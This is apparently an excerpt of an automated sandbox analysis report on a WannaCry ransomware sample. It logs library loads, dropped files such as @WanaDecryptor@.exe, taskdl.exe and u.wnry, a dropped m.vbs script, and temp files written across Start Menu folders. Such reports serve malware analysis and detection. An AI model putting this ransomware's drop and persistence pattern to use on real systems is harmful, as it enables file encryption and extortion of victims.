Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: mfc42.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched32.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Window found: window name: RICHEDIT

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

File opened: C:\Windows\SysWOW64\RICHED32.DLL

Source: WannaCry_2.EXE

Static file information: File size 3514368 > 1048576

Source: WannaCry_2.EXE

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000

Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCacheBlocking_prod.pdb.VP9VideoExtensions_8wekyb source: WannaCry_2.EXE, 00000000.00000002.2398944134.000000000371E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2lication Data\Applicatio source: WannaCry_2.EXE, 00000000.00000003.1232871894.00000000025B3000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,

0_2_100011D0

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_10006BD0 push eax; ret

0_2_10006BFE

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\m.vbs

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\WannaCry_2.EXE

File created: C:\Users\user\Documents\@WanaDecryptor@.exe

Jump to dropped file

Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Desktop\taskdl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Desktop\taskse.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Desktop\u.wnry	Jump to dropped file

Source: C:\Users\user\Desktop\WannaCry_2.EXE

File created: C:\Users\user\Desktop\u.wnry

Jump to dropped file

Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD13A0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD13A1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD13A2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD736A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD736B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD5DBA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDD28D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\~SDD28E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SDD28F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SDD290.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SDD291.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SDD292.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SDD293.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDD294.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SDD295.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SDD296.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SDD297.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SDD2A8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD91DD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD91DE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\7-Zip\~SD91DF.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SD91E0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD91E1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD91E2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD91E3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD91E4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD91E5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD91E6.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD91F6.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SD91F7.tmp	Jump to behavior
